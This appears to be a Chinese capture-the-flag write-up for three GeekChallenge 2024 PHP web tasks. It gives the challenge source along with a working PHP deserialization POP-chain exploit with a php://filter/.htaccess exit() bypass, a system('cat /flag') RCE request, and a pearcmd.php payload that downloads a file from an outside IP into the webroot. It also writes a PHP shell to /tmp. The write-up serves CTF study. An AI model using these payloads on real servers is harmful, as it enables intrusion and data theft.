ez_pop
题目:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
| <?php
Class SYC{
public $starven;
public function __call($name, $arguments){
if(preg_match('/%|iconv|UCS|UTF|rot|quoted|base|zlib|zip|read/i',$this->starven)){
die('no hack');
}
file_put_contents($this->starven,"<?php exit();".$this->starven);
}
}
Class lover{
public $J1rry;
public $meimeng;
public function __destruct(){
if(isset($this->J1rry)&&file_get_contents($this->J1rry)=='Welcome GeekChallenge 2024'){
echo "success";
$this->meimeng->source;
}
}
public function __invoke()
{
echo $this->meimeng;
}
}
Class Geek{
public $GSBP;
public function __get($name){
$Challenge = $this->GSBP;
return $Challenge();
}
public function __toString(){
$this->GSBP->Getflag();
return "Just do it";
}
}
if($_GET['data']){
if(preg_match("/meimeng/i",$_GET['data'])){
die("no hack");
}
unserialize($_GET['data']);
}else{
highlight_file(__FILE__);
}
|
exp:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
| <?php
Class SYC{
public $starven;
}
Class lover{
public $J1rry;
public $meimeng;
}
Class Geek{
public $GSBP;
}
$a = new lover;
$a->J1rry = "data://text/plain,Welcome GeekChallenge 2024";
$a->meimeng = new Geek;
$a->meimeng->GSBP = new lover;
$a->meimeng->GSBP->meimeng = new Geek;
$a->meimeng->GSBP->meimeng->GSBP = new SYC;
$a->meimeng->GSBP->meimeng->GSBP->starven = "php://filter/write=string.strip_tags/?>php_value auto_prepend_file /flag\n#/resource=.htaccess";
echo serialize($a);
?>
<?php
$char = 'r';
for ($ascii1 = 0; $ascii1 < 256; $ascii1++) {
for ($ascii2 = 0; $ascii2 < 256; $ascii2++) {
$aaa = '%'.$ascii1.'%'.$ascii2;
if(urldecode(urldecode($aaa)) == $char){
echo $char.': '.$aaa;
echo "\n";
}
}
}
?>
|
参考:php死亡exit()绕过 - xiaolong’s blog
谈一谈php://filter的妙用 | 离别歌
rce_me
1
2
3
| POST /?year=2e4&purpose=rce&code=system(%27cat%20/flag%27); HTTP/1.1
start=start+now&_%5B2024.geekchallenge.ctf=10932435112
|
ez_include
/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/var/www/html/xxxx.php
1
2
3
4
5
|
2. ```
http://80-75358d89-4e87-4ab7-a7a7-28f0b1348f7f.challenge.ctfplus.cn//levelllll2.php?syc=/usr/local/lib/php/pearcmd.php&+install+--installroot=/var/www/html+http://74.226.231.77/info.php
--installroot=/var/www/html 可以写成 -R /var/www/html
|
上面是出网时的payload,不出网时:
1
| GET /index.php?+config-create+/&file=/usr/local/lib/php/pearcmd.php&/<?=phpinfo()?>+/tmp/hello.php HTTP/1.1
|
参考p神的文章:Docker PHP裸文件本地包含综述 | 离别歌